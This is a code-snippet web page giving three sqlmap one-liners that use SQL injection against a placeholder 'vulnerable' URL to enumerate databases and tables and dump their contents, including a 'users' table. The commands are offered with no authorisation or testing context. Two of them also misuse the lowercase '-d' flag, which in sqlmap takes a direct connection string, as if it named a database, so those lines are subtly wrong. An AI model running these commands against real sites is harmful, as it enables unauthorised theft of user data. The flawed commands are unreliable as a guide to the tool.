Search
 
SCRIPT & CODE EXAMPLE
 

SHELL

sqlmap enumerate tables in databases

sqlmap -u "http://vulnerableparametersinurl.com?id=1" -d site_database --tables --dump
Comment

sqlmap enumerate databases

sqlmap -u "http://vulnerableparametersinurl.com?id=1" --dbs --dump
Comment

sqlmap enumerate table content

sqlmap -u "http://vulnerableparametersinurl.com?id=1" -d site_database -t users --dump
Comment

PREVIOUS NEXT
Code Example
Shell :: wondershaper 
Shell :: how to install prompt-sync in node js 
Shell :: bash generate random number between 
Shell :: how to store float values in shell script 
Shell :: install packer on ubuntu 
Shell :: flutter doctor android license error 
Shell :: how to remove nvm 
Shell :: git remove all tags 
Shell :: git stash show files changed 
Shell :: Vagrant - Remove all boxes 
Shell :: remove unnamed docker images 
Shell :: nvm install latest node and keep global packages 
Shell :: git undo last commit 
Shell :: how to make wsl backup 
Shell :: how to install aplay in ubuntu 
Shell :: lsb release command centos 
Shell :: git commit and tag 
Shell :: font manger for arch 
Shell :: test internet speed command line 
Shell :: vim open shell in current directory 
Shell :: zsh: command not found: valet 
Shell :: how to install .deb in terminal 
Shell :: linux folder size 
Shell :: linux install yarn 
Shell :: zsh: command not found: n 
Shell :: redis-cli port host 
Shell :: linux chmod remove sticky bit 
Shell :: reinstall chrome ubuntu 
Shell :: how to install zlib 
Shell :: a script that compiles a C file but does not link 
ADD CONTENT
Topic
Content
Source link
Name
7+8 =